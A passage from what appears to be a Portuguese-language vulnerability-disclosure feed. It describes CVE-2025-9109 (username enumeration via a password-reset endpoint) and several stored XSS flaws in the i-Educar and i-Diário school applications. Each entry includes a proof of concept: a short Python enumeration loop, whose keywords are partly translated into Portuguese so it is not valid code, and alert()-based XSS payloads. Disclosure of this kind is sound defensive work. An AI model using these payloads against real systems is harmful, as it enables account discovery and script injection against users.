senha</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9109</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Enumeração de Usuários foi identificada na funcionalidade <code>Esqueceu a Senha</code>. O sistema responde de forma diferente dependendo se o nome de usuário enviado existe, permitindo que um invasor enumere contas de usuário válidas. Isso pode auxiliar em ataques de força bruta direcionados ou campanhas de engenharia social.</p><h2 id="cve-2025-9109-a-vulnerabilidade-de-enumeração-de-usuários-foi-identificada-na-funcionalidade-esqueceu-a-senha">CVE-2025-9109: A vulnerabilidade de enumeração de usuários foi identificada na funcionalidade <code>Esqueceu a senha</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9109</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Enumeração de Usuários foi identificada na funcionalidade <code>Esqueceu a Senha</code>. O sistema responde de forma diferente dependendo se o nome de usuário enviado existe, permitindo que um invasor enumere contas de usuário válidas. Isso pode auxiliar em ataques de força bruta direcionados ou campanhas de engenharia social.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">Ao enviar uma solicitação POST para o endpoint <code>/password/email</code>, o sistema retorna respostas diferentes com base na correspondência do parâmetro de login fornecido com um usuário existente.</br></br>Por exemplo:</br><li>Se o usuário <b>existir</b>: a resposta contém uma mensagem como: "Um link de redefinição de senha foi enviado".</li><li>Se o usuário <b>não existir</b>: a resposta contém uma mensagem como: "Não conseguimos encontrar um usuário com esse login".</li></p> <p style="text-align: justify;">Esse comportamento permite que um invasor determine quais nomes de usuário são válidos simplesmente automatizando solicitações com entradas diferentes. A vulnerabilidade surge da falta de uma resposta uniforme para contas válidas e inválidas durante o processo de recuperação de senha.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Um script Python foi criado para demonstrar este problema:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="s2">"http://x.x.x.x/password/email"</span> </span></span><span class="line"><span class="cl"><span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="s2">"Content-Type"</span><span class="p">:</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"Origin"</span><span class="p">:</span> <span class="s2">"http://x.x.x.x"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"Referer"</span><span class="p">:</span> <span class="s2">"http://x.x.x.x/password/reset"</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="n">logins</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"admin"</span><span class="p">,</span> <span class="s2">"jose"</span><span class="p">,</span> <span class="s2">"maria"</span><span class="p">,</span> <span class="s2">"professor"</span><span class="p">,</span> <span class="s2">"aluno1"</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">para</span> <span class="n">login</span> <span class="n">em</span> <span class="n">logins</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="s2">"login"</span><span class="p">:</span> <span class="n">login</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="s2">"enviado"</span> <span class="n">em</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">lower</span><span class="p">():</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[+] </span><span class="si">{</span><span class="n">login</span><span class="si">}</span><span class="s2"> -> EXISTE"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">elif</span> <span class="s2">"não encontramos"</span> <span class="ow">in</span> <span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="o">.</span><span class="n">lower</span><span class="p">():</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[-] </span><span class="si">{</span><span class="n">login</span><span class="si">}</span><span class="s2"> -> NÃO EXISTE"</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este script conseguiu confirmar quais usuários estão cadastrados no sistema com base no conteúdo da resposta do sistema.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Exposição de contas válidas: Os invasores podem confirmar quais usuários estão cadastrados no sistema.</li> <li>Facilita ataques de força bruta: Usuários válidos podem ser alvo de tentativas automatizadas de adivinhação de senhas.</li> <li>Preenchimento de credenciais: Contas descobertas podem ser testadas com senhas vazadas de outros serviços.</li> <li>Phishing direcionado: Os invasores podem enviar e-mails manipulados por engenharia social para usuários confirmados, aumentando a taxa de sucesso de golpes.</li> <li>Perda de privacidade: A simples confirmação da existência de um usuário pode expor dados confidenciais em determinados contextos (por exemplo, contas em serviços restritos ou confidenciais).</li> <li>Escalonamento de ataques: A enumeração de usuários pode servir como um passo inicial para explorar vulnerabilidades mais graves, como invasões de contas.</li> <li>Danos à reputação: A percepção de falhas básicas de segurança pode afetar a credibilidade. do aplicativo com usuários e clientes.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://vuldb.com/?submit.627926" target="_blank" rel="noopener" >https://vuldb.com/?submit.627926</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/vanderlei50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/vanderlei-princival/" target="_blank" rel="noopener" >Vanderlei Princival</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8918/ https://www.cvehunters.com/pt/p/cve-2025-8918/ <h2 id="cve-2025-8918-cross-site-scripting-xss-armazenado-no-endpoint-educar_instituicao_cadphp-parâmetro-bairro">CVE-2025-8918: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_instituicao_cad.php</code> parâmetro <code>Bairro</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8918" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8918</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/intranet/educar_instituicao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Bairro</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_instituicao_cad.php</code></p><h2 id="cve-2025-8918-cross-site-scripting-xss-armazenado-no-endpoint-educar_instituicao_cadphp-parâmetro-bairro">CVE-2025-8918: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_instituicao_cad.php</code> parâmetro <code>Bairro</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8918" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8918</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/intranet/educar_instituicao_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Bairro</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_instituicao_cad.php</code></p> <p>Parâmetro: <code>Bairro</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Bairro</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8918/image.png" width="1121" height="480" srcset="/p/cve-2025-8918/image_hu_ca11c80f720a7acd.png 480w, /p/cve-2025-8918/image_hu_541791db714561e6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8919/ https://www.cvehunters.com/pt/p/cve-2025-8919/ <h2 id="cve-2025-8919-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-objetivos-de-aprendizagem-e-habilidades">CVE-2025-8919: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8919" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8919</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Código</code> e <code>Objetivo/Habilidade</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/objetivos-de-aprendizagem-e-habilidades</code></p><h2 id="cve-2025-8919-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-objetivos-de-aprendizagem-e-habilidades">CVE-2025-8919: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8919" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8919</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/objetivos-de-aprendizagem-e-habilidades</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Código</code> e <code>Objetivo/Habilidade</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/objetivos-de-aprendizagem-e-habilidades</code></p> <p>Parâmetros: <code>Código</code> e <code>Objetivo/Habilidade</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Código</code> e <code>Objetivo/Habilidade</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8919/image.png" width="1366" height="573" srcset="/p/cve-2025-8919/image_hu_61d6058a52e37131.png 480w, /p/cve-2025-8919/image_hu_29fd42848aa4238f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8920/ https://www.cvehunters.com/pt/p/cve-2025-8920/ <h2 id="cve-2025-8920-cross-site-scripting-xss-armazenado-no-endpoint-dicionario-de-termos-bncc-parâmetro-planos-de-ensino">CVE-2025-8920: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/dicionario-de-termos-bncc</code> parâmetro <code>Planos de ensino</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8920" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8920</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>//dicionario-de-termos-bncc</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Planos de ensino</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-8920-cross-site-scripting-xss-armazenado-no-endpoint-dicionario-de-termos-bncc-parâmetro-planos-de-ensino">CVE-2025-8920: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/dicionario-de-termos-bncc</code> parâmetro <code>Planos de ensino</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8920" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8920</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>//dicionario-de-termos-bncc</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Planos de ensino</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/dicionario-de-termos-bncc</code></p> <p>Parâmetro: <code>Planos de ensino</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Planos de ensino</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8920/image.png" width="1361" height="575" srcset="/p/cve-2025-8920/image_hu_b700522c20e08035.png 480w, /p/cve-2025-8920/image_hu_b173c6ab2683ec99.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="236" data-flex-basis="568px" /></p> <p><img src="/p/cve-2025-8920/image-1.png" width="1366" height="523" srcset="/p/cve-2025-8920/image-1_hu_697984d0ff1c654e.png 480w, /p/cve-2025-8920/image-1_hu_26a8359046aafdd9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="626px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8786/ https://www.cvehunters.com/pt/p/cve-2025-8786/ <h2 id="cve-2025-8786-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid">CVE-2025-8786: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8786" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8786</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-8786-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid">CVE-2025-8786: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8786" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8786</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code></p> <p>Parâmetros: <code>Registro de atividades</code> e <code>Conteúdos</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8786/image.png" width="1243" height="915" srcset="/p/cve-2025-8786/image_hu_3e27598d3abe3ea1.png 480w, /p/cve-2025-8786/image_hu_bce7c67fb3add2c9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="135" data-flex-basis="326px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8787/ https://www.cvehunters.com/pt/p/cve-2025-8787/ <h2 id="cve-2025-8787-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-disciplinaid">CVE-2025-8787: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8787" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8787</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-8787-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-disciplinaid">CVE-2025-8787: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8787" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8787</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/registros-de-conteudos-por-disciplina/[ID]</code></p> <p>Parâmetros: <code>Registro de atividades</code> e <code>Conteúdos</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Registro de atividades</code> e <code>Conteúdos</code>. Essa falta de validação permite que invasores injetem scripts 